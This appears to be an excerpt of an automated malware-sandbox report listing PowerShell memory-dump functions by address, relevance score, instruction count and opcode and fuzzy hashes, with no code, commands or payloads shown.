                                                                  • Instruction Fuzzy Hash: 4AF05E72A0E5498FDB64EB5CE4618A877E0FF4932475600BBE15DCB4A3DA25FC84C790
                                                                  Function 00007FFD9B8C41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80
                                                                  Function 00007FFD9B7FA2AA Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef5532bab3d669a1860dd96f8ffa3cff6c22b2e4e400784fcfe1ded3ad5d5237
                                                                  • Instruction ID: 8b2a7061d6a2575d52b679a8906af76b5a6c9153205c3cd09c37b59f9194fe07
                                                                  • Opcode Fuzzy Hash: ef5532bab3d669a1860dd96f8ffa3cff6c22b2e4e400784fcfe1ded3ad5d5237
                                                                  • Instruction Fuzzy Hash: 47E04631910A0C8F8B44EF18D8498EA7BA0FB28305B0002ABE80DC7120DB30AA58CBC2

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                  • API String ID: 0-3225005683
                                                                  • Opcode ID: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                                                  • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                                                  • Opcode Fuzzy Hash: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                                                  • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

                                                                  Executed Functions

                                                                  Function 00007FFD9B7D644D Relevance: .7, Instructions: 715COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e45a36716b894b56d55fe6a2c2f9ae97737f8b3263fe10915ec345b9143c6ddf
                                                                  • Instruction ID: b56b85e0e50233f3145f057cc430edb20f24522280d66343d16059d64333cb7c
                                                                  • Opcode Fuzzy Hash: e45a36716b894b56d55fe6a2c2f9ae97737f8b3263fe10915ec345b9143c6ddf
                                                                  • Instruction Fuzzy Hash: 32D19030A08A4D8FDF94DF58C465AE9BBE1FFA8340F15426AD44DD72A5CB34E885CB81
                                                                  Function 00007FFD9B8A660A Relevance: .5, Instructions: 461COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7c49275749966728c0905b17ab0c5f6c76f92d8f7842e6ca1f73b31f44a535e
                                                                  • Instruction ID: 374c5a3f4b82e7524e2320812124ef3ecf496fae04f4abfcad97add5c88446f8
                                                                  • Opcode Fuzzy Hash: f7c49275749966728c0905b17ab0c5f6c76f92d8f7842e6ca1f73b31f44a535e
                                                                  • Instruction Fuzzy Hash: 2BD158B2B0FA8E4FEBA5ABA848655B5BBD0EF59314B0901FED44DC70E7D918AC01C351
                                                                  Function 00007FFD9B7DA3AC Relevance: .3, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8233fca323a215e6ea3bdf319c7784236a292cb1a20f8c09cb7c671ded1b0ed4
                                                                  • Instruction ID: eccf6f7dcae749933bb1c8fa95d8316ab0841f91faacf7c4586de3023ff14d06
                                                                  • Opcode Fuzzy Hash: 8233fca323a215e6ea3bdf319c7784236a292cb1a20f8c09cb7c671ded1b0ed4
                                                                  • Instruction Fuzzy Hash: B8814D31A0DB8C4FDB59DB6C98456E97FE0FB96321F04436FD049C32A2DA74A84AC791
                                                                  Function 00007FFD9B7D974E Relevance: .1, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7904da2e3b87de4e55d7e5d216bf343aaa2d447f2554200854bad612e25c778
                                                                  • Instruction ID: 70c4a0d8952e8b92f954f9826df6e117e3247c640949f81eb0ec7b47b21abf4c
                                                                  • Opcode Fuzzy Hash: a7904da2e3b87de4e55d7e5d216bf343aaa2d447f2554200854bad612e25c778
                                                                  • Instruction Fuzzy Hash: AD412C7190DB884FD759DF5C9C1A6A9BFE0FB99310F04426FD089D3292C664B905C7C2
                                                                  Function 00007FFD9B6BE8EF Relevance: .1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1878450868.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b6bd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9807c477412866fbae5d8da3ca55ee15cb6fde10e58f33bb893552a048ceb66e
                                                                  • Instruction ID: b224b4bcf5f900d73d277bf9483c37b39deb5cb0f09d8d859f078eb3e898a058
                                                                  • Opcode Fuzzy Hash: 9807c477412866fbae5d8da3ca55ee15cb6fde10e58f33bb893552a048ceb66e
                                                                  • Instruction Fuzzy Hash: 1B31487140DBC44FE7969B3998559523FF0EF56320B1A06DFD0C8CB1A3D625E84AC7A2
                                                                  Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                  • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                                  • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                  • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9B8A414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3ba9c76b812426ca825957747f32be5abd44d94721cefb41bf3632dbc65b8c2
                                                                  • Instruction ID: 179bfb2d77a83c18c9bab8e290d68a1b9e04c089ba0591afc1fc6895ca5f49b4
                                                                  • Opcode Fuzzy Hash: c3ba9c76b812426ca825957747f32be5abd44d94721cefb41bf3632dbc65b8c2
                                                                  • Instruction Fuzzy Hash: F1F09A32B0E5098FDB68EB5CE4518A877E0EF5932071600BAE06DC71B3CA25EC408790
                                                                  Function 00007FFD9B8A4400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 734352866a7486e52b30f3784d5e5ed2d6df21b7946a5c0d5923a187f31a029c
                                                                  • Instruction ID: 3938f795043345527b0229bb82ca38e788a8fd97b0fe3a83b23454260c144206
                                                                  • Opcode Fuzzy Hash: 734352866a7486e52b30f3784d5e5ed2d6df21b7946a5c0d5923a187f31a029c
                                                                  • Instruction Fuzzy Hash: 7BF05E32A0F5498FDB64EB5CE4618A877E0FF4932475600BAE15DCB4A3DA29BC44C790
                                                                  Function 00007FFD9B8A41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7D8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                  • API String ID: 0-2388461625
                                                                  • Opcode ID: bcc06938ea63191cee45e705da55fa88be9bb517e08e1f42c75fe065d1d827ea
                                                                  • Instruction ID: 79cce54cdb1bb4ab17fa38f3220a3fc588b67c58b22875dadc209c7226430fe4
                                                                  • Opcode Fuzzy Hash: bcc06938ea63191cee45e705da55fa88be9bb517e08e1f42c75fe065d1d827ea
                                                                  • Instruction Fuzzy Hash: 29212277E085614AC30677BCBD659DC2B91DB9437935A42F3E228CF193CD24A48B8682

                                                                  Executed Functions

                                                                  Function 00007FFD9B8C6605 Relevance: .4, Instructions: 433COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2041936650.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6356f26c91934a316e6e61557ddb123cbcdb247727cf6e720b56f3d215b58630
                                                                  • Instruction ID: d943b50dfbc8afd1380bef8367fa65a0d6a605256cc739e23d6818798370c2e1
                                                                  • Opcode Fuzzy Hash: 6356f26c91934a316e6e61557ddb123cbcdb247727cf6e720b56f3d215b58630
                                                                  • Instruction Fuzzy Hash: 31D158F2B0EA8E4FEBA5BB6848645B57BA0EF69314B1901FFD44CC70E3D918A805C341
                                                                  Function 00007FFD9B7F9738 Relevance: .1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27de0f6a68f1ef794d7b7766cfe41eb7873f55da5fa8f15a27b9a05e7910718b
                                                                  • Instruction ID: 1c992082284f2d3d314d3d0e7084bf2cdddf9be88f2e9f6964f7643ee80143b2
                                                                  • Opcode Fuzzy Hash: 27de0f6a68f1ef794d7b7766cfe41eb7873f55da5fa8f15a27b9a05e7910718b
                                                                  • Instruction Fuzzy Hash: 1A411D31A0DB488FDB589F5C984A6B9BBE0FB54310F44426FE44983262DB20F955CBC6
                                                                  Function 00007FFD9B6DE620 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2039867935.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b6dd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 365481eb24b08a9eff12162bcffb1d6da48a63d050e22a23e0facf90aec8f27b
                                                                  • Instruction ID: b1d17d52225b0273fa84d6c116e365c17363604fd0dc2d4a2daf12c053076d66
                                                                  • Opcode Fuzzy Hash: 365481eb24b08a9eff12162bcffb1d6da48a63d050e22a23e0facf90aec8f27b
                                                                  • Instruction Fuzzy Hash: 0941167140EBC44FE7668B399C559523FF0EF56220B1A06EFD0C8CB1A3D625A846C792
                                                                  Function 00007FFD9B7FA71C Relevance: .1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f8f6d9c889780dc494ce9e6ec787ae970986ae4585425dee05183b4acab5813
                                                                  • Instruction ID: c9a1c49f069d609236df7cf50b7cb77817ecefc6558520d225d19f4c55da1d7f
                                                                  • Opcode Fuzzy Hash: 5f8f6d9c889780dc494ce9e6ec787ae970986ae4585425dee05183b4acab5813
                                                                  • Instruction Fuzzy Hash: A3312B3190EB8C4FDF55DBA89859AE97FF0EF66320F04416FC048C7163D5645856CBA1
                                                                  Function 00007FFD9B7FA020 Relevance: .1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65f457698f9eb9800e2bc039344c4fe630f4c8098774bbf986618e3c2c6da110
                                                                  • Instruction ID: e7a7a71b2f71cf229b439f44cd1dab2f8cd755783bd802ea11682b6960f3909a
                                                                  • Opcode Fuzzy Hash: 65f457698f9eb9800e2bc039344c4fe630f4c8098774bbf986618e3c2c6da110
                                                                  • Instruction Fuzzy Hash: 53312967B0FBC90FE721DA68A8650E53FB0EF25B44B0941BAC0D84B0B3FD55664587C6
                                                                  Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                                                  Function 00007FFD9B8C414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2041936650.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8e623a205014f6b522650f2ae78d373338ee2bb18734a08f6a66f5b45038b10e
                                                                  • Instruction ID: d4b004f55b151f3b9d8a91dfd8ca315fa0a1ba73057d5882ae5d9424aee53ebd
                                                                  • Opcode Fuzzy Hash: 8e623a205014f6b522650f2ae78d373338ee2bb18734a08f6a66f5b45038b10e
                                                                  • Instruction Fuzzy Hash: 7AF09A32B0E5098FD768EB8CE4518A873E0EF5932071600BBE0ADC75B3CA25EC808740
                                                                  Function 00007FFD9B8C4400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2041936650.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 494d35529bd99e33711bfd74a98345c06085d2b2c588e19bee5cde22b41848a1
                                                                  • Instruction ID: 8de65b55b9be13ba09c5e48f4b48e1f9bbe9593a1bb73f33d8d3055d7b73372a
                                                                  • Opcode Fuzzy Hash: 494d35529bd99e33711bfd74a98345c06085d2b2c588e19bee5cde22b41848a1
                                                                  • Instruction Fuzzy Hash: 67F05E72B0E5498FDB68EB5CE4618A877E0FF4932475600BBE159CB4A3DA25EC84C750
                                                                  Function 00007FFD9B8C41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2041936650.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7F8995 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                  • API String ID: 0-2357752022
                                                                  • Opcode ID: 8e95c05d3985ceb2688f785aad0e090140a27314e07ff7160b2fd6850f9f0ba8
                                                                  • Instruction ID: 5fc05e0eae2de007e73a92598709b932fe9039b3f8df812157453a74c2addb27
                                                                  • Opcode Fuzzy Hash: 8e95c05d3985ceb2688f785aad0e090140a27314e07ff7160b2fd6850f9f0ba8
                                                                  • Instruction Fuzzy Hash: 9341A263B0F7D69FE326876949750997FA0EF1236470A53F7C1D48B0B3ED18250A8296
                                                                  Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                  • API String ID: 0-3225005683
                                                                  • Opcode ID: db0c1d812fb334ef627ac546dd3fad6e1f4be7f409516e181b75d3ed5e758025
                                                                  • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                                                  • Opcode Fuzzy Hash: db0c1d812fb334ef627ac546dd3fad6e1f4be7f409516e181b75d3ed5e758025
                                                                  • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

                                                                  Executed Functions

                                                                  Function 00007FFD9B8A6605 Relevance: .4, Instructions: 435COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2235041699.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cebfde56ec5b859e94d0b2d9c88abc8d9616d0f6903963113d18e37f5e741243
                                                                  • Instruction ID: ddb6e78af61963d18095a50155c489e4b36428283995b188d0582a603dbff39e
                                                                  • Opcode Fuzzy Hash: cebfde56ec5b859e94d0b2d9c88abc8d9616d0f6903963113d18e37f5e741243
                                                                  • Instruction Fuzzy Hash: 5ED15BB2A1FACE4FEBA5E7A848655B5BBE0EF19214B0901FED45CC70E7D918AC01C351
                                                                  Function 00007FFD9B7D9750 Relevance: .1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2233519662.00007FFD9B7D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b7d5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bc733770bdd07ad93a584180f3f603e278be9d671e44aa7c6a98d1b3e75708fd
                                                                  • Instruction ID: 734685ab25357f299233aaa849343948d69f171b5b3a37478a8bfbfab963f038
                                                                  • Opcode Fuzzy Hash: bc733770bdd07ad93a584180f3f603e278be9d671e44aa7c6a98d1b3e75708fd
                                                                  • Instruction Fuzzy Hash: A741FC3150DB884FDB19DF5C9C0A6B9BFE0FB95310F0442AFD499932A2CA64A915C7C2
                                                                  Function 00007FFD9B6BF19F Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2232301196.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b6bd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 432b18451a892c546b5fbde256563f70ddd0fd45039f455ac607091b09c8ebc8
                                                                  • Instruction ID: 4a2303008dd3ae48e5dbbb51fb819dc206525ef128e724c04248c14a5554b72e
                                                                  • Opcode Fuzzy Hash: 432b18451a892c546b5fbde256563f70ddd0fd45039f455ac607091b09c8ebc8
                                                                  • Instruction Fuzzy Hash: 5041267180EBC44FD7568B2898519523FF0EF57320B1A05DFD088CF1B3D625A94ACBA2
                                                                  Function 00007FFD9B7DA49C Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2233519662.00007FFD9B7D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b7d5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd1b31b614022705fc359cbaaa70081f2fbb1bb518d49536d286c70ddc4a460f
                                                                  • Instruction ID: 47e21cc4ae807c9e30fb2a08fcab31895c5df31993c4790845647240d20861d0
                                                                  • Opcode Fuzzy Hash: fd1b31b614022705fc359cbaaa70081f2fbb1bb518d49536d286c70ddc4a460f
                                                                  • Instruction Fuzzy Hash: 7C21FB3190D74C4FDB59DBAC984A7E97FF0EB96321F04426FD049C3162D674A41ACB91
                                                                  Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2233519662.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9a62bc07bb7a5a4d09b4234028e30c5b4a68ecbb62572f343dbf5a8cbab154d
                                                                  • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                                  • Opcode Fuzzy Hash: e9a62bc07bb7a5a4d09b4234028e30c5b4a68ecbb62572f343dbf5a8cbab154d
                                                                  • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
